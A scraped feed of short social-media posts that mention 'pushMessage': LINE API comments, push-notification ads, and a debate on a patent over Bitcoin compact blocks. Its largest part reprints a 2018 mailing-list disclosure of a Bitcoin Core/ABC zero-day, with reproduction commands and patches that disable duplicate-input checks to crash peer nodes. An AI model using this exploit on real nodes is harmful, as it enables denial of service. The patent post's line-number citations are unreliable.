おー!
めっちゃいいですね!
これ、有料機能とかでpushMessage使ったタスクリマインダーとかにもなりそうな気がしました
1
2
3
224
10 May 2025
Cool! Discussion and debate.
"How can 2012 software or a 2016 BIP 152 violate a 2019 patent (at earliest)? Prior art"
Maybe. Stratum V1 (2012) and BIP 22/152 (2012-2016) are excellent invalidity fodder. The patent survived initial examination by arguing a formatting/timing nuance (“full ordered list re-broadcast on every template refresh while hashing”). Whether that nuance withstands PTAB or district-court scrutiny is an open question—but it has not been adjudicated yet. Until it is, anyone using the method after 20 Nov 2024 can potentially (theoretically) be sued for infringement and must raise invalidity as a defense.
"The code snippets doesn't even seem to be real code from Bitcoin Core. It's just hallucinated code."
“The code snippets don’t even seem to be real code from Bitcoin Core.”
Fair skepticism! But those snippets appear to be legit if looking at Bitcoin Core v27.0-rc1, a release candidate you can verify yourself on GitHub (bitcoin/bitcoin, tag v27.0). Here’s where they live:
Constructor: CBlockHeaderAndShortTxIDs(const CBlock&, uint64_t)
Found in src/blockencodings.h, around lines 93–102.
This builds a compact block header with short transaction IDs.
PushMessage: m_connman.PushMessage(&pnode, msgMaker.Make(NetMsgType::CMPCTBLOCK, cmpctblock));
Located in src/net_processing.cpp, roughly lines 7021–7035.
This sends the compact block to peers.
Deserialize Path: A switch-case for NetMsgType::CMPCTBLOCK leading to ProcessMessageCmpctBlock
Same file, src/net_processing.cpp, around lines 8848–8859.
Handles incoming compact block messages.
FillBlock / CheckBlock:
In src/blockencodings.cpp, lines ~428–463.
Reconstructs and validates blocks.
You can clone the repo, checkout tag v27.0, and grep those lines yourself.
All of that being said, this is a hypothetical analysis with no warranties of accuracies or fitness. This is not an accusation of infringement and these patents are not mine, and I am not a lawyer (and this is not legal advice), engineer or developer. I am just a Dad, and probably not as smart as you guys. I am just interested in jumpstarting the conversation.
All disclaimers from my original post apply here as well.
2
8
343
24 Feb 2025
Date: Mon, 17 Sep 2018 14:57:46 0000
To: Pieter Wuille <pieter.wui...@gmail.com>, deadalnix
<deadal...@gmail.com>, Andrea Suisani <sick...@gmail.com>, Gregory
Maxwell <gmaxw...@gmail.com>, "Wladimir J. van der Laan"
<laa...@gmail.com>
From: beardnboobies <beardnboob...@protonmail.com>
Subject: Zero day exploit in Bitcoin ABC and Bitcoin Core
Dear Bitcoiners,
Please find attached an encrypted description of a crashing zero day
exploit for Bitcoin Core as well as Bitcoin ABC. This has not been
reproduced for Bitcoin Unlimited, though for advisory reasons, I am
sending it to one of their members that I could find a PGP key for as
well.
Please forward this to any party who might have a valid interest,
including Bitcoin miners.
Thank you very much.
===
Problem description:
The following, miner-exploitable zero day has been found in Bitcoin ABC as
well as in Bitcoin Core:
Duplicate inputs are not checked in CheckBlock,
only when they are accepted into the mempool.
This creates a problem insofar as a transaction might bypass
the mempool when it is included in a block, for example if
it is transmitted as an extra transaction along with a compact
block.
A later assertion assert(is_spent) in SpendCoins (in validation.cpp)
seems to prevent the worse outcome of monetary inflation by
the comparatively better result of crashing the node.
To reproduce (Description is for Bitcoin ABC, but applies similarly to
Bitcoin Core):
Create one instance of ABC bitcoind without the patch below
applied (A) and create on instance of ABC with the patch applied (B).
The patch removes sending of transactions and testing for double-spent
inputs for the attacker node.
Run both in regtest mode and point them to different data directories,
like so and connect them together:
A: ./bitcoind -regtest -rpcport=15000 -listen -debug -datadir=/tmp/abc.1
B: ./bitcoind -regtest -rpcport=15001 -connect=localhost -debug
-datadir=/tmp/abc.2
Now on the prepared attacker node B, create a bunch of blocks and a
transaction
that double-spends its input, like so for example:
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 generate 200
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 getnewaddress
<address>
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001 sendtoaddress
<address>
<resulting-txid>
> ./bitcoin-tx -regtest -create in=<resulting-txid>:<vout>
in=<resulting-txid>:<vout> outaddr=99.9:<address>
<resulting-txn-hex>
The double entry of the input here is not a typo. This is the desired
double-spend.
Sign the resulting transaction hex like so:
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001
signrawtransaction <txid>
<signed-txn-hex>
For Core, this step needs to be adapted to signrawtransactionwithkey.
And send the result into the small regtest test netwrok:
> ./bitcoin-cli -regtest -datadir=/tmp/abc.2 -rpcport=15001
sendrawtransaction <signed-txn-hex>
Voila, your node A should have just aborted like this:
bitcoind: validation.cpp:1083: void SpendCoins(CCoinsViewCache&, const
CTransaction&, CTxUndo&, int): Assertion `is_spent' failed.
Aborted (core dumped)
If you like this work or want to pay out a bounty for finding a zero day,
please do so in BCH to this address. Thank you very much in advance.
bitcoincash:qr5yuq3q40u7mxwqz6xvamkfj8tg45wyus7fhqzug5
The patch for ABC:
diff --git a/src/consensus/tx_verify.cpp b/src/consensus/tx_verify.cpp
index ee909deb9..ff7942361 100644
--- a/src/consensus/tx_verify.cpp
b/src/consensus/tx_verify.cpp
@@ -229,7 229,7 @@ static bool CheckTransactionCommon(const CTransaction
&tx,
// Check for duplicate inputs - note that this check is slow so we
skip it
// in CheckBlock
- if (fCheckDuplicateInputs) {
if (0) {
std::set<COutPoint> vInOutPoints;
for (const auto &txin : tx.vin) {
if (!vInOutPoints.insert(txin.prevout).second) {
diff --git a/src/net_processing.cpp b/src/net_processing.cpp
index e4ecc793c..ee1cc3cda 100644
--- a/src/net_processing.cpp
b/src/net_processing.cpp
@@ -1269,12 1269,6 @@ static void ProcessGetData(const Config
&config, CNode *pfrom,
// however we MUST always provide at least
what the
// remote peer needs.
typedef std::pair<unsigned int, uint256>
PairType;
- for (PairType &pair : merkleBlock.vMatchedTxn)
{
- connman->PushMessage(
- pfrom,
- msgMaker.Make(NetMsgType::TX,
- *block.vtx[pair.first]));
- }
}
// else
// no response
@@ -1321,25 1315,6 @@ static void ProcessGetData(const Config
&config, CNode *pfrom,
bool push = false;
auto mi = mapRelay.find(inv.hash);
int nSendFlags = 0;
- if (mi != mapRelay.end()) {
- connman->PushMessage(
- pfrom,
- msgMaker.Make(nSendFlags, NetMsgType::TX,
*mi->second));
- push = true;
- } else if (pfrom->timeLastMempoolReq) {
- auto txinfo = mempool.info(inv.hash);
- // To protect privacy, do not answer getdata using the
- // mempool when that TX couldn't have been INVed
in reply to
- // a MEMPOOL request.
- if (txinfo.tx &&
- txinfo.nTime <= pfrom->timeLastMempoolReq) {
- connman->PushMessage(pfrom,
- msgMaker.Make(nSendFlags,
- NetMsgType::TX,
- *txinfo.tx));
- push = true;
- }
- }
if (!push) {
vNotFound.push_back(inv);
}
diff --git a/src/validation.cpp b/src/validation.cpp
index a31546432..a9edbb956 100644
--- a/src/validation.cpp
b/src/validation.cpp
@@ -1080,7 1080,7 @@ void SpendCoins(CCoinsViewCache &view, const
CTransaction &tx, CTxUndo &txundo,
for (const CTxIn &txin : tx.vin) {
txundo.vprevout.emplace_back();
bool is_spent = view.SpendCoin(txin.prevout,
&txundo.vprevout.back());
- assert(is_spent);
//assert(is_spent);
}
}
----
The same patch for Core:
diff --git a/src/consensus/tx_verify.cpp b/src/consensus/tx_verify.cpp
index 0628ec1d4..a06f77f8b 100644
--- a/src/consensus/tx_verify.cpp
b/src/consensus/tx_verify.cpp
@@ -181,7 181,7 @@ bool CheckTransaction(const CTransaction& tx,
CValidationState &state, bool fChe
}
// Check for duplicate inputs - note that this check is slow so
we skip it in CheckBlock
- if (fCheckDuplicateInputs) {
if (0) {
std::set<COutPoint> vInOutPoints;
for (const auto& txin : tx.vin)
{
diff --git a/src/net_processing.cpp b/src/net_processing.cpp
index b48a3bd22..9b7fb5839 100644
--- a/src/net_processing.cpp
b/src/net_processing.cpp
@@ -1219,8 1219,6 @@ void static ProcessGetBlockData(CNode* pfrom,
const CChainParams& chainparams, c
// Thus, the protocol spec specified allows for
us to provide duplicate txn here,
// however we MUST always provide at least what
the remote peer needs
typedef std::pair<unsigned int, uint256> PairType;
- for (PairType& pair : merkleBlock.vMatchedTxn)
- connman->PushMessage(pfrom,
msgMaker.Make(SERIALIZE_TRANSACTION_NO_WITNESS, NetMsgType::TX,
*pblock->vtx[pair.first]));
}
// else
// no response
@@ -1284,18 1282,6 @@ void static ProcessGetData(CNode* pfrom, const
CChainParams& chainparams, CConnm
bool push = false;
auto mi = mapRelay.find(inv.hash);
int nSendFlags = (inv.type == MSG_TX ?
SERIALIZE_TRANSACTION_NO_WITNESS : 0);
- if (mi != mapRelay.end()) {
- connman->PushMessage(pfrom, msgMaker.Make(nSendFlags,
NetMsgType::TX, *mi->second));
- push = true;
- } else if (pfrom->timeLastMempoolReq) {
- auto txinfo = mempool.info(inv.hash);
- // To protect privacy, do not answer getdata using
the mempool when
- // that TX couldn't have been INVed in reply to a
MEMPOOL request.
- if (txinfo.tx && txinfo.nTime <=
pfrom->timeLastMempoolReq) {
- connman->PushMessage(pfrom,
msgMaker.Make(nSendFlags, NetMsgType::TX, *txinfo.tx));
- push = true;
- }
- }
if (!push) {
vNotFound.push_back(inv);
}
diff --git a/src/validation.cpp b/src/validation.cpp
index 947192be0..66536af24 100644
--- a/src/validation.cpp
b/src/validation.cpp
@@ -1315,7 1315,7 @@ void UpdateCoins(const CTransaction& tx,
CCoinsViewCache& inputs, CTxUndo &txund
for (const CTxIn &txin : tx.vin) {
txundo.vprevout.emplace_back();
bool is_spent = inputs.SpendCoin(txin.prevout,
&txundo.vprevout.back());
- assert(is_spent);
//assert(is_spent);
}
}
// add outputs
_______________________________________________
bitcoin-core-dev mailing list
bitcoin-core-...@lists.linuxfoundation.org
2
256
12 Sep 2024
Technisch lief der #Warntag2024 (#Warntag) bei mir wirklich gut ab.
Standort: irgendwo in NRW bin ich grade
11:00 - Sirenen
11:00 - Pushmessage auf iPhone (Provider Telekom) ca. 15 Sekunden nach Sirenen
11:02 - Meldung NINA Warnapp von 11:00 kommt durch auf iPhone und Watch
1
2
486
18 Jan 2023
MessagingAPIは無料のPushMessage上限200まで下がるのか。
200人友達いたら1通で終わりか。
でもそんなに友達いないわ、よかった。
2
287
11 Aug 2022
Truepush is the best push notification service available with free access to limitless features.
Login today & send unlimited push messages
app.truepush.com/home/regist…
#pushnotification #pushnotifications #webpsuh
#Marketing #reengagement
#digitalmarketingservices #pushmessage
ALT free unlimited push service
3
29 Jul 2022
miTT Wallet PUSH allows you to send push messages from your Joomla! website to the iOS device. #pwa #pushMessage #iOS #joomla
youtu.be/eUjOIADHXD8
3
6 Jun 2022
これキツイのが取り消しのイベントがreplyToken持ってないからpushMessageでしか送れないこと
4
1 Jun 2022
Good read by @MeghanSuslak for @airship - Media Guidelines for More Engaging Notifications #pushpush #pushnotifications #pushmessage #mobileapps buff.ly/3a4dyYR
1
3
27 Aug 2021
I guess you cannot understand if a page is loaded from outside, since "load" is a bit uncertain. Loading the resources doesn't mean the page is loaded. But if it's the one you build the web page, too, you can use pushMessage. Mostly, pushMessage can be handled by upper context.
1
28 Jun 2021
1
2
4 Jan 2021
You know the #NewYear2021 starts right, if you check custom push notification sounds! One of our favourite features ready to be rolled out in the next weeks! Some small things create so much fun.. 🚀 #pushnotifications #pushpush #pushmessage #mobilefirst #notifications
1
2